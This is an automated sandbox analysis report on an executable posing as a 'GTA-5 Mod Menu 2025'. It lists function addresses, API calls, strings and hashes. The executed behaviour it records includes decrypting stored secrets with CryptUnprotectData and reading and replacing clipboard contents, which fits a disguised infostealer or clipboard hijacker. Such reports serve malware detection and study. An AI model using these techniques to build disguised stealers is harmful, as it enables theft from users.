Associated: 00000003.00000002.2096922060.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2096936284.0000000000FB0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2096949572.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2096964575.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_f80000_GTA-5-Mod-Menu-2025.jbxd

Similarity

API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
String ID:
API String ID: 2112829910-0
Opcode ID: 036b815668dc472ea77d01318cd017024e5511eec4d354f28b551bfe50ec5e13
Instruction ID: 6e24bfb7eaafa703dd8b1425dd5af7d625bf63d35ad0a24a14d32e17dd1e8ae1
Opcode Fuzzy Hash: 036b815668dc472ea77d01318cd017024e5511eec4d354f28b551bfe50ec5e13
Instruction Fuzzy Hash: 60D17BB5D042489FEF15CFE8C880AEDBBB5FF09314F28416AE456EB352D634A942DB50

Function 00F94A33 Relevance: 6.2, APIs: 4, Instructions: 168COMMON

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 00F94AFA
___AdjustPointer.LIBCMT ref: 00F94B1D
___AdjustPointer.LIBCMT ref: 00F94BB9

Memory Dump Source

Source File: 00000003.00000002.2096902371.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true

Associated: 00000003.00000002.2096888451.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2096922060.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2096936284.0000000000FB0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2096949572.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2096964575.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_f80000_GTA-5-Mod-Menu-2025.jbxd

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: d306b10ba91bb4f0dec3dabd3faa357e8787cce7fbfdc4750acfbafb675266e9
Instruction ID: f13ffd7b116ff19730d926e84be091ed8e0e8163593eccee758490b76470b9b7
Opcode Fuzzy Hash: d306b10ba91bb4f0dec3dabd3faa357e8787cce7fbfdc4750acfbafb675266e9
Instruction Fuzzy Hash: AE51E172A05A069FFF289F10D891FAAB3A4FFA0320F144529E90587291E735FC42E794

Function 00F9B536 Relevance: 6.1, APIs: 4, Instructions: 82COMMON

Download Yara Rule

APIs

Part of subcall function 00F957C1: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00F96F95,?,00000000,-00000008), ref: 00F95822

GetLastError.KERNEL32(00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 00F9B59A
__dosmaperr.LIBCMT ref: 00F9B5A1
GetLastError.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 00F9B5DB
__dosmaperr.LIBCMT ref: 00F9B5E2

Memory Dump Source

Source File: 00000003.00000002.2096902371.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true

Associated: 00000003.00000002.2096888451.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2096922060.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2096936284.0000000000FB0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2096949572.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2096964575.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_f80000_GTA-5-Mod-Menu-2025.jbxd

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide
String ID:
API String ID: 1913693674-0
Opcode ID: 6f85fc8f5932b75ae6a67a07ea3930d0a76eeecb53b5eaa1e01ccae440ea86b5
Instruction ID: e0eec8eb89800de93fd39828cfc59094b0350c48782b5ca0a9c1aa83d29ea103
Opcode Fuzzy Hash: 6f85fc8f5932b75ae6a67a07ea3930d0a76eeecb53b5eaa1e01ccae440ea86b5
Instruction Fuzzy Hash: 9A21C871A00209EFBF10AF67ED8196BB7A9FF043657154428F819D7150DB34ED40A7A0

Function 00F8C9D2 Relevance: 6.1, APIs: 4, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2096902371.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true

Associated: 00000003.00000002.2096888451.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2096922060.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2096936284.0000000000FB0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2096949572.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2096964575.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_f80000_GTA-5-Mod-Menu-2025.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ced1a7b8a919bc27145d7c81f21fdc9ef9a5527aa2a86eaa76612e3dac3d99b
Instruction ID: 85ad501fe76829fd42923ac86da5e1ed670a693b04234a59588ef19df9057b5f
Opcode Fuzzy Hash: 5ced1a7b8a919bc27145d7c81f21fdc9ef9a5527aa2a86eaa76612e3dac3d99b
Instruction Fuzzy Hash: 3C215E72A0020AAF9B24FF759C919AA77A9FF043647104525F91AD7650D738EC40A7F0

Function 00F9C92E Relevance: 6.1, APIs: 4, Instructions: 74COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 00F9C936

Part of subcall function 00F957C1: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00F96F95,?,00000000,-00000008), ref: 00F95822

FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00F9C96E
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00F9C98E

Memory Dump Source

Source File: 00000003.00000002.2096902371.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true

Associated: 00000003.00000002.2096888451.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2096922060.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2096936284.0000000000FB0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2096949572.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2096964575.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_f80000_GTA-5-Mod-Menu-2025.jbxd

Similarity

API ID: EnvironmentStrings$Free$ByteCharMultiWide
String ID:
API String ID: 158306478-0
Opcode ID: d25aa198b65c376e8a6b89d99e82eb0af6ffaedb8f5637e16d676acbc3d83405
Instruction ID: 22f883ed6aac41a8d4fd915d244d43c97afd3ea3460bb2fcb5976f8b29e555f3
Opcode Fuzzy Hash: d25aa198b65c376e8a6b89d99e82eb0af6ffaedb8f5637e16d676acbc3d83405
Instruction Fuzzy Hash: AD1184F2901619BFBF1227B59C89C7F7EACDE867A47500525F906D1101FE289E00B6F5

Function 00FA4450 Relevance: 6.0, APIs: 4, Instructions: 29COMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(00000000,?,?,00000000,00000000,?,00FA399F,00000000,00000001,?,?,?,00F9DB00,?,00000000,00000000), ref: 00FA4467
GetLastError.KERNEL32(?,00FA399F,00000000,00000001,?,?,?,00F9DB00,?,00000000,00000000,?,?,?,00F9D446,?), ref: 00FA4473

Part of subcall function 00FA44D0: CloseHandle.KERNEL32(FFFFFFFE,00FA4483,?,00FA399F,00000000,00000001,?,?,?,00F9DB00,?,00000000,00000000,?,?), ref: 00FA44E0

___initconout.LIBCMT ref: 00FA4483

Part of subcall function 00FA44A5: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00FA4441,00FA398C,?,?,00F9DB00,?,00000000,00000000,?), ref: 00FA44B8

WriteConsoleW.KERNEL32(00000000,?,?,00000000,?,00FA399F,00000000,00000001,?,?,?,00F9DB00,?,00000000,00000000,?), ref: 00FA4498

Memory Dump Source

Source File: 00000003.00000002.2096902371.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true

Associated: 00000003.00000002.2096888451.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2096922060.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2096936284.0000000000FB0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2096949572.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2096964575.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_f80000_GTA-5-Mod-Menu-2025.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 52d5598eae1b06170174b5319b6b8c2e4e2f41a7b63479ba8ae684896df91151
Instruction ID: a56da8238d4c67e4c97c97fc0520322a046aabda7e583ee31901e962e1f3dbd7
Opcode Fuzzy Hash: 52d5598eae1b06170174b5319b6b8c2e4e2f41a7b63479ba8ae684896df91151
Instruction Fuzzy Hash: B0F0307640021CBFCF225F91EC48A9A3F26FB8E3B1F514020FE0896130C7729820BB90

Function 00F8A2F5 Relevance: 6.0, APIs: 4, Instructions: 25timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(?), ref: 00F8A307
GetCurrentThreadId.KERNEL32 ref: 00F8A316
GetCurrentProcessId.KERNEL32 ref: 00F8A31F
QueryPerformanceCounter.KERNEL32(?), ref: 00F8A32C

Memory Dump Source

Source File: 00000003.00000002.2096902371.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true

Associated: 00000003.00000002.2096888451.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2096922060.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2096936284.0000000000FB0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2096949572.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2096964575.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_f80000_GTA-5-Mod-Menu-2025.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: bce81483294894bd674505fa5b2d691fc586897213848fb037e64a0f4125e892
Instruction ID: e5164c47ac02086f04e78d9b9f0eb803f741dcfaa0a18610c6bc353192bee9fa
Opcode Fuzzy Hash: bce81483294894bd674505fa5b2d691fc586897213848fb037e64a0f4125e892
Instruction Fuzzy Hash: 6BF0B2B0C0020CEBCB04DBB4CA4898EBBF4FF1D200B914995E412E7110E734AB44AB50

Function 00F9A0E6 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 191COMMON

Download Yara Rule

APIs

Part of subcall function 00F9590A: GetLastError.KERNEL32(00000000,?,00F97C8D), ref: 00F9590E
Part of subcall function 00F9590A: SetLastError.KERNEL32(00000000,?,?,00000028,00F91F53), ref: 00F959B0

GetACP.KERNEL32(-00000002,00000000,?,00000000,00000000,?,00F8F7C9,?,?,?,00000055,?,-00000050,?,?,?), ref: 00F9A1A5
IsValidCodePage.KERNEL32(00000000,-00000002,00000000,?,00000000,00000000,?,00F8F7C9,?,?,?,00000055,?,-00000050,?,?), ref: 00F9A1DC

Strings

utf8, xrefs: 00F9A2AE

Memory Dump Source

Source File: 00000003.00000002.2096902371.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true

Associated: 00000003.00000002.2096888451.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2096922060.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2096936284.0000000000FB0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2096949572.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2096964575.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_f80000_GTA-5-Mod-Menu-2025.jbxd

Similarity

API ID: ErrorLast$CodePageValid
String ID: utf8
API String ID: 943130320-905460609
Opcode ID: 570e29c9cc324a919aa2efa42e853d5bb62ee6bec9447f22304c7ac9d222a9e7
Instruction ID: fc779d9721de02147df9c86ccca348a8b832f2456aaf1e484bce7ab526278670
Opcode Fuzzy Hash: 570e29c9cc324a919aa2efa42e853d5bb62ee6bec9447f22304c7ac9d222a9e7
Instruction Fuzzy Hash: AB512871A00305AAFF29AB748C42FB673A8EF45720F140429F5559B181FB75D980BBE3

Function 00F95130 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 122COMMON

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,00F95031,?,?,00000000,00000000,00000000,?), ref: 00F95155

Strings

RCC, xrefs: 00F9516F
MOC, xrefs: 00F95167

Memory Dump Source

Source File: 00000003.00000002.2096902371.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true

Associated: 00000003.00000002.2096888451.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2096922060.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2096936284.0000000000FB0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2096949572.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2096964575.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_f80000_GTA-5-Mod-Menu-2025.jbxd

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: 15ba95f8a57b5a7b4b5c12a3eb192ee1216996a9392f1101337f04f80e8da9b0
Instruction ID: 15b4edef40b31ab67fafd0b017be3f3827c9f1472f3629d8044dee6645c1a279
Opcode Fuzzy Hash: 15ba95f8a57b5a7b4b5c12a3eb192ee1216996a9392f1101337f04f80e8da9b0
Instruction Fuzzy Hash: 44417931D00609AFEF16DF98DC81AEE7BB5FF48714F184069FA0567211D335A991EB50

Function 00F9499C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 97COMMON

Download Yara Rule

APIs

___except_validate_context_record.LIBVCRUNTIME ref: 00F94C13

Strings

csm, xrefs: 00F94C35
csm, xrefs: 00F94CA6

Memory Dump Source

Source File: 00000003.00000002.2096902371.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true

Associated: 00000003.00000002.2096888451.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2096922060.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2096936284.0000000000FB0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2096949572.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2096964575.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_f80000_GTA-5-Mod-Menu-2025.jbxd

Similarity

API ID: ___except_validate_context_record
String ID: csm$csm
API String ID: 3493665558-3733052814
Opcode ID: 8b4f7d858d5dc019287e76bcd60908bca01627e6996d013cddc0e698195dc029
Instruction ID: 301ca63cc9da68eba751d3467e0e8fd9d4a6b1bca96fe5e9c9a4ceb3024aa40d
Opcode Fuzzy Hash: 8b4f7d858d5dc019287e76bcd60908bca01627e6996d013cddc0e698195dc029
Instruction Fuzzy Hash: 8331CF76801218AFEF268F50DC44D6A7B65FF29325B18825AF8545A121C332ECA3FF91

Function 00F81DB0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 78libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32 ref: 00F81E6E

Strings

VirtualProtect, xrefs: 00F81E61
@, xrefs: 00F81EB7

Memory Dump Source

Source File: 00000003.00000002.2096902371.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true

Associated: 00000003.00000002.2096888451.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2096922060.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2096936284.0000000000FB0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2096949572.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2096964575.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_f80000_GTA-5-Mod-Menu-2025.jbxd

Similarity

API ID: AddressProc
String ID: @$VirtualProtect
API String ID: 190572456-29487290
Opcode ID: a5ce620f7789add63d321d081f2fc6aef5f0192c1daf5d7f73e275a691072fa7
Instruction ID: e7c224b8d8855387e409e117010beecc30fb3daa5ce2c357557c1872a0c11d0b
Opcode Fuzzy Hash: a5ce620f7789add63d321d081f2fc6aef5f0192c1daf5d7f73e275a691072fa7
Instruction Fuzzy Hash: CA41D1B0901209DFDB04EFA9D9986DEBBF0FF48354F10851AE848AB350D779A985DF81

Analysis Process: GTA-5-Mod-Menu-2025.exePID: 6216, Parent PID: 5276COMMON

Execution Graph

Execution Coverage:	9.9%
Dynamic/Decrypted Code Coverage:	3.2%
Signature Coverage:	52.1%
Total number of Nodes:	495
Total number of Limit Nodes:	42

Executed Functions

Function 00411E10 Relevance: 138.5, APIs: 3, Strings: 75, Instructions: 1970COMMON

Download Yara Rule

Strings

P, xrefs: 00412262
, xrefs: 004126AF
[, xrefs: 004132C6
D, xrefs: 00413782
N, xrefs: 0041358B
7, xrefs: 00412707
B, xrefs: 00413306
B, xrefs: 00413276
^, xrefs: 0041350B
`, xrefs: 00412C4C
Q, xrefs: 00413246
:, xrefs: 00413663
X, xrefs: 0041353B
), xrefs: 00413326
D, xrefs: 00413B2F
2, xrefs: 00413336
,, xrefs: 004126CF
L, xrefs: 00413226
D, xrefs: 00413775
B, xrefs: 00412F6F
B, xrefs: 004135EB
w, xrefs: 00413346
*, xrefs: 004126DF
s, xrefs: 00412567
L, xrefs: 0041359B
~, xrefs: 00412E30
r, xrefs: 00412562
I, xrefs: 004129FF
6, xrefs: 004126FF
N, xrefs: 00411EE2
^, xrefs: 004132A6
Z, xrefs: 00412B90
_, xrefs: 00412F5F
], xrefs: 00412F9F
Z, xrefs: 0041352B
v, xrefs: 0041233D
m, xrefs: 00413286
W, xrefs: 00412F8F
T, xrefs: 0041355B
8, xrefs: 00413653
., xrefs: 004126BF
A, xrefs: 004132E6
", xrefs: 0041269F
_, xrefs: 00412F7F
F, xrefs: 004135CB
S, xrefs: 00413216
S, xrefs: 00412FAF
4, xrefs: 00413623
!, xrefs: 00413613
#, xrefs: 00413356
~, xrefs: 00412A0F
V, xrefs: 0041354B
M, xrefs: 00412A1F
!, xrefs: 00413603
e, xrefs: 00412143
m, xrefs: 00411FB3
|, xrefs: 00413316
4, xrefs: 0041270F
+, xrefs: 00413633
D, xrefs: 004135DB
J, xrefs: 004135AB
@, xrefs: 004135FB
8, xrefs: 00412DC8
R, xrefs: 0041356B
^, xrefs: 00413296
H, xrefs: 004135BB
V, xrefs: 004132F6
-, xrefs: 004135A3
P, xrefs: 0041357B
C, xrefs: 00412B60
z, xrefs: 004132D6
(, xrefs: 004126EF
', xrefs: 00413366
S, xrefs: 00413236
\, xrefs: 0041351B

Memory Dump Source

Source File: 00000004.00000002.3337569166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.3337569166.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_GTA-5-Mod-Menu-2025.jbxd

Similarity

API ID:
String ID: $!$!$"$#$'$($)$*$+$,$-$.$2$4$4$6$7$8$8$:$@$A$B$B$B$B$C$D$D$D$D$F$H$I$J$L$L$M$N$N$P$P$Q$R$S$S$S$T$V$V$W$X$Z$Z$[$\$]$^$^$^$_$_$`$e$m$m$r$s$v$w$z$|$~$~
API String ID: 0-650732166
Opcode ID: 8476d63cc7d4c05428c07658a937d8cbb15d6580c753659a6c62e2790e8b69ab
Instruction ID: 2ff037e82c39d8484067e2ec1d8d6beae3856f8f60c524dd392be279c4487d9d
Opcode Fuzzy Hash: 8476d63cc7d4c05428c07658a937d8cbb15d6580c753659a6c62e2790e8b69ab
Instruction Fuzzy Hash: 5D03FF3150C7C18AC3359B3885843DFBFD16B96324F088A6EE5E9873D2D7B88586875B

Function 00437C80 Relevance: 28.9, APIs: 11, Strings: 5, Instructions: 866
memorycomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoCreateInstance.OLE32(0044268C,00000000,00000001,0044267C,00000000), ref: 00437F54
SysAllocString.OLEAUT32(00001F7A), ref: 00437FB7
CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00437FF7
SysAllocString.OLEAUT32(00001F7A), ref: 0043805B
SysAllocString.OLEAUT32(26E420F4), ref: 00438117
VariantInit.OLEAUT32(D4D7D6C1), ref: 00438182
SysFreeString.OLEAUT32(?), ref: 004384C1
GetVolumeInformationW.KERNELBASE(?,00000000,00000000,00001F7A,00000000,00000000,00000000,00000000), ref: 004384F9

Strings

VXY^, xrefs: 00437D45, 00437DFC
FW, xrefs: 004381B4
9\, xrefs: 004381A4
$*, xrefs: 0043806D
RK, xrefs: 0043822B, 0043822F

Memory Dump Source

Source File: 00000004.00000002.3337569166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.3337569166.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_GTA-5-Mod-Menu-2025.jbxd

Similarity

API ID: String$Alloc$BlanketCreateFreeInformationInitInstanceProxyVariantVolume
String ID: 9\$FW$RK$VXY^$$*
API String ID: 505850577-3836248974
Opcode ID: bc64886510a09306bd420e3a84a103cc457e0968f255a6ac2ef7d176806d5cde
Instruction ID: 6926d6d2aad4ba28142aefd9611f22a979aaa00092556b22ceb2f4df3deccf76
Opcode Fuzzy Hash: bc64886510a09306bd420e3a84a103cc457e0968f255a6ac2ef7d176806d5cde
Instruction Fuzzy Hash: F642E072A083518FD714CF29C84076BFBE2EFD9310F18892EF9959B391DA79D8058B46

Function 0041071B Relevance: 21.9, APIs: 2, Strings: 10, Instructions: 857
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

#, xrefs: 00411118
b, xrefs: 004107D8
\, xrefs: 00410DB5
$, xrefs: 004110A0
F, xrefs: 00410D2B
S, xrefs: 00410C29
%, xrefs: 00410ABB
o, xrefs: 00410917
N, xrefs: 0041072E
', xrefs: 00410FE0

Memory Dump Source

Source File: 00000004.00000002.3337569166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.3337569166.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_GTA-5-Mod-Menu-2025.jbxd

Similarity

API ID:
String ID: #$$$%$'$F$N$S$\$b$o
API String ID: 0-84100704
Opcode ID: 920434e3bbb1055f08cbbbef1449c2755f9aadc7d1f1bcbf8e1b300a40acd0ac
Instruction ID: c00f3763dd2cd0e02029fc9ed613a1e5ffa9e5b3df9123746fde01e65d56ae4d
Opcode Fuzzy Hash: 920434e3bbb1055f08cbbbef1449c2755f9aadc7d1f1bcbf8e1b300a40acd0ac
Instruction Fuzzy Hash: 3072C572A0C7908BD3249F38858139FBBE1ABC5324F198A3ED9E9D73D1D67889418747

Function 05AD1000 Relevance: 19.6, APIs: 13, Instructions: 81
clipboardsleepmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000001), ref: 05AD1032
OpenClipboard.USER32(00000000), ref: 05AD103C
GetClipboardData.USER32(0000000D), ref: 05AD104C
GlobalLock.KERNEL32(00000000), ref: 05AD105D
GlobalAlloc.KERNEL32(00000002,-00000004), ref: 05AD1090
GlobalLock.KERNEL32 ref: 05AD10A0
GlobalUnlock.KERNEL32 ref: 05AD10C1
EmptyClipboard.USER32 ref: 05AD10CB
SetClipboardData.USER32(0000000D), ref: 05AD10D6
GlobalFree.KERNEL32 ref: 05AD10E3
GlobalUnlock.KERNEL32(?), ref: 05AD10ED
CloseClipboard.USER32 ref: 05AD10F3
GetClipboardSequenceNumber.USER32 ref: 05AD10F9

Memory Dump Source

Source File: 00000004.00000002.3338430846.0000000005AD1000.00000020.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: true

Associated: 00000004.00000002.3338414518.0000000005AD0000.00000002.00000800.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3338446261.0000000005AD2000.00000002.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5ad0000_GTA-5-Mod-Menu-2025.jbxd

Similarity

API ID: ClipboardGlobal$DataLockUnlock$AllocCloseEmptyFreeNumberOpenSequenceSleep
String ID:
API String ID: 1416286485-0
Opcode ID: 3e08f92c2cd2cfcca91a2cee3f8d01a2565cb681b498d8ca820720bd9eb32861
Instruction ID: 7a49853d29d254ee8dec114da61c7593194d67c9681fb238b49b1ab18a447780
Opcode Fuzzy Hash: 3e08f92c2cd2cfcca91a2cee3f8d01a2565cb681b498d8ca820720bd9eb32861
Instruction Fuzzy Hash: 82217F39616250ABD7207BB5AC0EF6EBBA8FF047A1F044428FD57D6151EF318802CAB1

Function 004153E8 Relevance: 18.7, APIs: 1, Strings: 9, Instructions: 1161encryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00415AB7

Strings

L4, xrefs: 00416290
7aij, xrefs: 00415C40
Gaij, xrefs: 00415C9A
2S], xrefs: 00415689
L4, xrefs: 00416080
=6&$, xrefs: 00415B04
*!:-, xrefs: 00415B0B
7. -, xrefs: 00415AF6
3!15, xrefs: 00415AFD

Memory Dump Source

Source File: 00000004.00000002.3337569166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.3337569166.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_GTA-5-Mod-Menu-2025.jbxd

Similarity

API ID: CryptDataUnprotect
String ID: *!:-$2S]$3!15$7. -$7aij$=6&$$Gaij$L4$L4
API String ID: 834300711-704517314
Opcode ID: 822a40aa5428660162201b021693d50cb2301493423aa4e64fb8d6747bfb54a0
Instruction ID: 2ac1b55faac0ce13068304374b71d1fcc00fe8222e30f950e028eed32ca90894
Opcode Fuzzy Hash: 822a40aa5428660162201b021693d50cb2301493423aa4e64fb8d6747bfb54a0
Instruction Fuzzy Hash: 9F8259B5600B00CFD7248F25D8817A7B7B2FF96314F18856DD4968B7A2E738E842CB59

Function 00408780 Relevance: 7.7, APIs: 5, Instructions: 240
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcessId.KERNEL32 ref: 004087A4
GetCurrentThreadId.KERNEL32 ref: 004087AE
SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 004088DE
GetForegroundWindow.USER32 ref: 004089A1
ExitProcess.KERNEL32 ref: 00408A8A

Memory Dump Source

Source File: 00000004.00000002.3337569166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.3337569166.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_GTA-5-Mod-Menu-2025.jbxd

Similarity

API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
String ID:
API String ID: 4063528623-0
Opcode ID: a4a9dc485aa32321631a9ba88ac381a08f4a0956d527d7d86e0b56ac7b8da779
Instruction ID: cc6bda6eca60c13a9d8e9732e89be167aa24b00acb0026d6f1978ca01de75c66
